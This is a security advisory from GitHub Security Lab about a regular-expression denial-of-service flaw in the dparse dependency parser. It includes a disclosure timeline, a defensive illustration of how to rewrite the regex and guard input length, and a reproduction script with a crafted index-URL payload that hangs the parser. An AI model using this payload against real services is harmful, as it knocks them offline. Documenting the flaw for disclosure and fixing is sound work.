Coordinated Disclosure Timeline
- 2021-08-31: Created an issue asking for contact details.
- 2022-01-05: Received an email from Philippe Ombredanne (@pombredanne), who is a contributor to dparse (but not the owner) and also maintains a fork. Philippe has created an advisory in the fork: GHSA-38w3-hw4v-3qfg. I have uploaded our report to the advisory.
- 2022-01-10: Fixed by Philippe Ombredanne in the nexB fork.
- 2022-08-02: A dparse user asked for an update on the issue and I responded.
- 2022-08-02: GHSA-8fg9-p83m-x5pq created.
Summary
Dependency Parser contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
Dependency Parser
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability in inefficient regular expressions: on a crafted input string the matching engine backtracks so much that evaluation takes an extremely long time.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions.
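As an added illustration of the backtracking behaviour behind ReDoS (this is not code from the advisory or from dparse, and the pattern below is a constructed textbook example, not the regular expression reported here), the following script contrasts a nested-quantifier pattern with an equivalent linear one, checks that the two accept the same strings, and shows the input-length guard a maintainer can put in front of a regex that cannot be rewritten immediately:

```python
import itertools
import re
import time

# Constructed example pattern (not the dparse regex): an outer '+' over an
# inner '+' lets the engine try exponentially many ways to split a run of
# 'a's once the trailing character fails to match '$'.
VULNERABLE = re.compile(r"^(a+)+$")

# Same language, written without nested quantifiers: one 'a+' already
# matches every non-empty run of 'a's, and it backtracks linearly.
HARDENED = re.compile(r"^a+$")

# Defensive cap on the size of a line handed to a regex (assumed value).
MAX_INPUT_LEN = 256


def crafted_input(n: int) -> str:
    """n repeated 'a's followed by a character that can never match."""
    return "a" * n + "!"


def timed_search(pattern: re.Pattern, text: str):
    """Return (match, seconds) for pattern.search(text)."""
    start = time.perf_counter()
    match = pattern.search(text)
    return match, time.perf_counter() - start


def patterns_agree(max_len: int) -> bool:
    """Exhaustively check that both patterns accept the same strings over
    the alphabet {'a', '!'} up to max_len characters, i.e. that the rewrite
    changed performance but not semantics."""
    for length in range(max_len + 1):
        for chars in itertools.product("a!", repeat=length):
            s = "".join(chars)
            if (VULNERABLE.search(s) is None) != (HARDENED.search(s) is None):
                return False
    return True


def guarded_search(pattern: re.Pattern, text: str, max_len: int = MAX_INPUT_LEN):
    """Refuse over-long input before the regex engine ever sees it. This is
    the stop-gap mitigation for a regex with super-linear worst case."""
    if len(text) > max_len:
        raise ValueError(f"input of {len(text)} chars exceeds limit of {max_len}")
    return pattern.search(text)


def rejects_oversized(pattern: re.Pattern, text: str) -> bool:
    """True if the guard refuses the input instead of matching it."""
    try:
        guarded_search(pattern, text)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Doubling-ish growth per extra character for VULNERABLE; flat for HARDENED.
    for n in range(10, 19, 2):
        _, t_bad = timed_search(VULNERABLE, crafted_input(n))
        _, t_good = timed_search(HARDENED, crafted_input(n))
        print(f"n={n:2d}  nested: {t_bad:8.5f}s  linear: {t_good:8.5f}s")
    print("same language up to length 8:", patterns_agree(8))
    print("guard rejects 5000-char line:", rejects_oversized(VULNERABLE, crafted_input(5000)))
```

The timing loop stays at small n because the nested pattern's cost roughly doubles with every added character; the hardened pattern is run on far longer input without trouble, which is the property a fix for this class of bug should be tested for. The length guard is a containment measure only: it bounds the damage until the pattern itself is rewritten.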
Vulnerability
The vulnerable regular expression is here.
Please follow these steps to reproduce the issue:
- Install Dependency Parser:
pip3 install dparse
- Run the code below with python3:
from dparse import parse, filetypes

# A requirements.txt body whose index-URL option carries a crafted value
# that makes the regular expression backtrack catastrophically.
content = """
-i http://0.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.',
"""

# Parsing this content hangs in the vulnerable version.
df = parse(content, file_type=filetypes.requirements_txt)
Impact
This issue may lead to a denial of service.
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-111 in any communication regarding this issue.